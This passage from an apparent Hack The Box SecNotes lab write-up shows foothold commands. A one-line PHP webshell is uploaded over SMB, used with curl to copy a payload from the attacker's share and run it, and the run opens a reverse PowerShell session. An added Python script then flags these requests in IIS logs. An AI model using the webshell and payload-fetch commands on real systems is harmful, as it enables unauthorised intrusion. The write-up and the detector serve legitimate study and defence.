Webshell


I am also able to gain a foothold on the target system as the tyler user through a webshell. More on this will be noted here; this page covers execution only.

┌──(kali㉿kali)-[~/…/htb/labs/secnotes/ubuntu]
└─$ echo '<?php system($_GET['cmd']); ?>' > webshell.php

I will create a simple PHP webshell that runs whatever is passed in the cmd query parameter.

smb: \> put webshell.php 
putting file webshell.php as \webshell.php (0.3 kb/s) (average 0.3 kb/s)

Uploading the PHP webshell via SMB into the web root of the site served on the target's port 8808.

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=whoami'
secnotes\tyler

I can confirm command execution: the webshell runs as the tyler user.

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=copy+\\10.10.14.10\smb\64ps9998.exe+C:\tmp\64ps9998.exe'
        1 file(s) copied.

Copying the same payload from my SMB share to C:\tmp on the target.

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl 'http://secnotes.htb:8808/webshell.php?cmd=C:\tmp\64ps9998.exe'    

Triggering the payload.

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 50179
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\inetpub\new-site> whoami
secnotes\tyler
PS C:\inetpub\new-site> hostname
SECNOTES
PS C:\inetpub\new-site> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

Initial foothold established on the target system as the tyler user through a webshell.
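From the defender's side, the three webshell requests above leave a distinctive trace in the IIS access log. The following is an added example, not part of the original writeup: it parses constructed W3C-format log lines modelled on those requests (the timestamps and the parameter names in CMD_PARAMS are assumptions) and flags command-parameter requests to PHP files, copies from remote UNC paths and executable launches.

```python
"""Flag webshell-style requests in IIS W3C access logs (defender-side triage)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines modelled on the requests in the writeup; not real target logs.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2018-08-20 10:00:01 10.10.10.97 GET /index.php - 8808 10.10.14.10 200
2018-08-20 10:00:05 10.10.10.97 GET /webshell.php cmd=whoami 8808 10.10.14.10 200
2018-08-20 10:00:09 10.10.10.97 GET /webshell.php cmd=copy+\\10.10.14.10\smb\64ps9998.exe+C:\tmp\64ps9998.exe 8808 10.10.14.10 200
2018-08-20 10:00:12 10.10.10.97 GET /webshell.php cmd=C:\tmp\64ps9998.exe 8808 10.10.14.10 200
2018-08-20 10:00:20 10.10.10.97 GET /login.php user=tyler 8808 10.10.14.1 200
"""

CMD_PARAMS = {"cmd", "c", "exec", "command"}           # assumed common command parameter names
UNC_RE = re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")   # file pulled from a remote UNC share
EXE_RE = re.compile(r"\.exe(\s|$)", re.I)               # an executable is referenced

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(query):
    """Return the reasons a query string looks like webshell traffic (empty if none)."""
    reasons = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() in CMD_PARAMS:
            value = unquote_plus(value)          # '+' and %XX decode to the real command line
            reasons.append(f"command parameter '{name}': {value}")
            if UNC_RE.search(value):
                reasons.append("fetches a file from a remote UNC share")
            if EXE_RE.search(value):
                reasons.append("references an executable")
    return reasons

def find_webshell_hits(text):
    """Return (time, client ip, uri stem, reasons) for every suspicious PHP request."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"].lower().endswith(".php") and rec["cs-uri-query"] != "-":
            reasons = classify(rec["cs-uri-query"])
            if reasons:
                hits.append((rec["time"], rec["c-ip"], rec["cs-uri-stem"], reasons))
    return hits

if __name__ == "__main__":
    for t, ip, stem, why in find_webshell_hits(SAMPLE_LOG):
        print(t, ip, stem, "; ".join(why))
```

A newly created .php file in the web root, combined with the SMB write that placed it there, is the other signal worth correlating with these log hits.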